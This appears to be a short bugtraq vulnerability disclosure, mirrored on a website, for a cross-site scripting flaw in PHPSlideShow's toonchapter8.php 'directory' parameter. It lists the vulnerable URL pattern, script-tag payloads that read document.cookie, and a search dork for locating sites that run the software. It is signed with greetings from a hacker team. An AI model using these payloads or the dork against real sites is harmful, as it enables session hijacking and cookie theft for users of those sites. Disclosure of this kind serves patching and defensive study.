PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability

From: sys-project@hotmail.com
To: bugtraq@securityfocus.com
Cc:
Subject: PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability
Date:


# PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability
# Download:
# http://fmdeluxe.com/
# Bug found by Jose Luis Gngora Fernndez / JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Powered by PHPSlideShow"
# Stop lammer

# Exploit In (XSS):

../PATH/toonchapter8.php?directory=[XSS]
http://www.example.com/PATH/toonchapter8.php?directory=[XSS]

# Cross Siting Scripting (Code):

"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>

 //---------------------------------------\\

Greetz To: All Hackers
Jose Luis Gngora Fernndez / JosS!





Copyright © 1995-2020 LinuxRocket.net. All rights reserved.